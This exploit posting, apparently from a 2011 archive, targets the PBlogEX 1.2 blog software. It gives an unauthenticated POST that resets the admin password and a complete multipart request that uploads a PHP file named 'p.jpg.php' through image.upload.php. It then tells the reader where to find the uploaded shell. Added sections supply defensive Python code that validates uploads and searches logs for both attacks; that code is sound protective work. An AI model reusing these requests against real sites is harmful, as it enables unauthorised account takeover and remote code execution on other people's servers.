
PBlogEX 1.2 Shell Upload

Posted Mar 5, 2011
Authored by l3lack_lord | Site mokhareb.net

PBlogEX version 1.2 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell
SHA-256 | 2972818b94aa02b80d9f73313b212f8b50c5f576e6a7312659f54e76d7b1c144

# PBlogEX v1.2 Multiple Vulnerabilities

# vendor: http://www.twelvedev.com/
# By l3lack_lord
# WwW.Mokhareb.NeT
# Demo: http://f-ochoa.com/
# Tested On: Apache/2.2.9 - PHP/5.2.6
# Date: 2011/03/4

# Description:
# The admin password change script can be executed without authentication.

# POC:
http://Site.com/PBlogEX/admin/admin.password.php
[POST]user=1&password=l3lack_lord

The password is now changed to l3lack_lord
http://Site.com/PBlogEX/admin
You still need to guess the admin user name :)

#################################################################

# Description:
# Remote shell upload is possible on this CMS without authentication via image.upload.php

# POC:
http://Site.com/PBlogEX/admin/image.upload.php
[POST]
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://Site.com/PBlogEX/admin/admin.php
Content-Type: multipart/form-data; boundary=---------------------------225932708016080
Content-Length: 5775

-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="filephoto"; filename="p.jpg.php"\r\n
Content-Type: image/jpeg\r\n
\r\n
<?php\r\n
phpinfo();\r\n
?>\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="titlephoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="descphoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="Default1"\r\n
\r\n
on\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="0"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="1"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="2"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="3"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="4"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="5"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="6"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="7"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="8"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="9"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="10"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="11"\r\n
\r\n
.\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="12"\r\n
\r\n
j\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="13"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="14"\r\n
\r\n
g\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="15"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="16"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="17"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="18"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="19"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="20"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="21"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="22"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="23"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="24"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="25"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="26"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="27"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="28"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="29"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="30"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="31"\r\n
\r\n
d\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="32"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="33"\r\n
\r\n
s\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="34"\r\n
\r\n
c\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="35"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="36"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="37"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="38"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="39"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="40"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="41"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="42"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="43"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="44"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="45"\r\n
\r\n
D\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="46"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="47"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="48"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="49"\r\n
\r\n
u\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="50"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="51"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="52"\r\n
\r\n
1\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="53"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="54"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="55"\r\n
\r\n
n\r\n
-----------------------------225932708016080--\r\n


Copy the file name from the error message that is printed, e.g. 2011-03-02_7032_p.jpg.php
Shell Path :
http://Site.com/PBlogEX/images/2011-03-02_7032_p.jpg.php
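
Added example, not part of the original advisory or of PBlogEX: the checks an upload handler needs in order to reject the `p.jpg.php` part shown above, written in Python for illustration. The names `check_upload` and `stored_name` are hypothetical, and the handler is assumed to have already verified an admin session, which the advisory reports as missing.

```python
import os
import secrets

# Allowed final extension -> magic bytes the content must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pht", "cgi", "pl"}

def check_upload(client_name, client_type, data):
    """Return a list of rejection reasons; an empty list means acceptable.

    client_type (the part's Content-Type) is taken as a parameter but
    deliberately ignored: the client chooses it, as the PoC's image/jpeg shows.
    """
    reasons = []
    base = os.path.basename(client_name.replace("\\", "/"))
    parts = base.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in ALLOWED:
        reasons.append("final extension %r is not an allowed image type" % ext)
    # Reject a script extension in any position, not only the last one.
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        reasons.append("script extension inside the file name")
    sigs = ALLOWED.get(ext) or sum(ALLOWED.values(), ())
    if not data.startswith(sigs):
        reasons.append("content does not match an image signature")
    return reasons

def stored_name(ext):
    """Server-generated name: nothing from the client's file name survives."""
    return "%s.%s" % (secrets.token_hex(16), ext)

# Constructed inputs: the PoC's file part, and a minimal JPEG header.
POC = ("p.jpg.php", "image/jpeg", b"<?php\r\nphpinfo();\r\n?>\r\n")
GOOD = ("holiday.JPG", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)

if __name__ == "__main__":
    print(check_upload(*POC))
    print(check_upload(*GOOD), stored_name("jpg"))
```

Signature checks do not stop a valid image that also carries PHP code, so the upload directory should additionally be served with script execution disabled.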


# Virangar Security Team , DeltaHacking TEam , Aria-Security
# tnX t0 mY cronies Hares And Netw0rm :-*
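
Added example, not from the original advisory: a log triage script for both issues described above, flagging POSTs to `admin/admin.password.php` and `admin/image.upload.php` and requests for script files under `images/`. The log lines are constructed in Apache combined format, and the rule names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines (Apache combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Mar/2011:10:15:01 +0000] "POST /PBlogEX/admin/admin.password.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2011:10:15:09 +0000] "POST /PBlogEX/admin/image.upload.php HTTP/1.1" 200 731 "http://Site.com/PBlogEX/admin/admin.php" "Mozilla/5.0"
203.0.113.7 - - [02/Mar/2011:10:15:20 +0000] "GET /PBlogEX/images/2011-03-02_7032_p.jpg.php HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Mar/2011:10:16:00 +0000] "GET /PBlogEX/images/2011-02-27_1180_cat.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.4 - - [02/Mar/2011:10:16:05 +0000] "GET /PBlogEX/index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ADMIN_POST = re.compile(r'/admin/(admin\.password|image\.upload)\.php$', re.I)
# A script extension anywhere in a file name under images/: Apache can also
# run p.php.jpg as PHP when the handler is assigned with AddHandler.
SCRIPT_IN_IMAGES = re.compile(
    r'/images/[^/?]*\.(php\d?|phtml|phar|pht)(\.|$|\?)', re.I)

def scan(log_text):
    """Return (client_ip, rule, path) findings for an analyst to review."""
    findings, posted = [], defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, _ts, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        hit = ADMIN_POST.search(path)
        if method == "POST" and hit:
            # Legitimate admins also post here; compare against known admin IPs.
            posted[ip].add(hit.group(1))
            findings.append((ip, "admin-post", path))
        elif SCRIPT_IN_IMAGES.search(url):
            rule = "script-in-images"
            if "image.upload" in posted[ip] and status == "200":
                rule = "upload-then-execute"
            findings.append((ip, rule, path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```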

